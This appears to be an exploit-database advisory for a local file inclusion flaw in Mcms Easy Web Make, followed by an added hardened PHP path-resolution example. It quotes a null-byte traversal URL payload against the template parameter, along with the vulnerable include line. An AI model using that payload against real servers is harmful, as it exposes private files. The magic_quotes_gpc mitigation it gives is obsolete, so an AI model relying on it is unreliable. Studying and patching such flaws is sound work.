Vendor: Easy Web Make
By: MhZ91
CVSS: 5.5 (MEDIUM)
Local File Inclusion
CWE: 931
Product Name: Easy Web Make
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Mcms Easy Web Make – Local File Inclusion

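The exploit allows an attacker to include local files on the server by manipulating the template parameter of modules/cms/index.php in the URL. The script places that parameter directly into the path of an include statement, and a trailing %00 null byte cuts off the suffix the script appends. The vulnerability can be exploited only if the magic_quotes_gpc setting is turned off.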

Mitigation:

To mitigate this vulnerability, ensure that the magic_quotes_gpc setting is turned on in the server configuration.

Exploit-DB raw data:

---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
 |___|___|  /\__|  /______  /\___  >__|            |___||__| 
          \/\______|      \/     \/                          
---------------------------------------------------------------
Http://www.inj3ct-it.org     Staff[at]inj3ct-it[dot]org 
---------------------------------------------------------------
  Local File Inclusion
---------------------------------------------------------------
# Author: MhZ91
# Title: Mcms Easy Web Make - Local File Inclusion
# Download: http://sourceforge.net/projects/easywebmake/
# Bug: Local File Inclusion
# Visit: http://www.inj3ct-it.org
---------------------------------------------------------------
Only If magic_quotes_gpc is Off
Exploit: http://[site]/modules/cms/index.php?template=[LFI]%00
Vuln Code: include"includes/$template/template.config.php";
---------------------------------------------------------------

# milw0rm.com [2007-12-11]
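
An added example, not code from the advisory or from the Easy Web Make project: a hardened way to resolve the path that the quoted include statement builds from the template parameter, using an allowlist pattern and a canonical-path check instead of relying on magic_quotes_gpc. The function name resolve_template_config, the 64-character limit and the temporary demo directory are assumptions, and the code targets PHP 7.1 or later.

```php
<?php
// Added example, not project code. resolve_template_config() and the
// 64-character limit are assumptions made for this illustration.
function resolve_template_config($template, string $baseDir): ?string
{
    // Reject arrays (?template[]=x) and any other non-string input.
    if (!is_string($template)) {
        return null;
    }
    // Allowlist of characters: '/', '\', '.' and the NUL byte cannot pass,
    // so neither directory traversal nor %00 truncation reaches include.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $template) !== 1) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Canonicalise, then confirm the file still lives under the includes
    // directory (covers a template directory that is a symlink elsewhere).
    $path = realpath("$base/$template/template.config.php");
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a throwaway includes/ tree with one valid template.
$dir = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir("$dir/default", 0700, true);
file_put_contents("$dir/default/template.config.php", "<?php // demo\n");

// Constructed inputs: one legitimate name, the rest must be rejected.
$inputs = ['default', "../outside\0", '..', 'default/../default', ['x'], ''];
foreach ($inputs as $in) {
    $path = resolve_template_config($in, $dir);
    printf("%-24s => %s\n", json_encode($in), $path === null ? 'rejected' : 'accepted');
    // In the application: include $path only when it is not null.
}

unlink("$dir/default/template.config.php");
rmdir("$dir/default");
rmdir($dir);
```

magic_quotes_gpc was removed in PHP 5.4.0, so input validation of this kind is the control that carries over to current PHP versions.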